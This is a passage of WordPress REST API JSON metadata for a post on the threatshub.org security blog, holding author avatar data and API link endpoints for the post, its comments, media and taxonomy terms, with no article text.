Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46270","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=46270"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46270\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/46271"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=46270"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=46270"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=46270"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}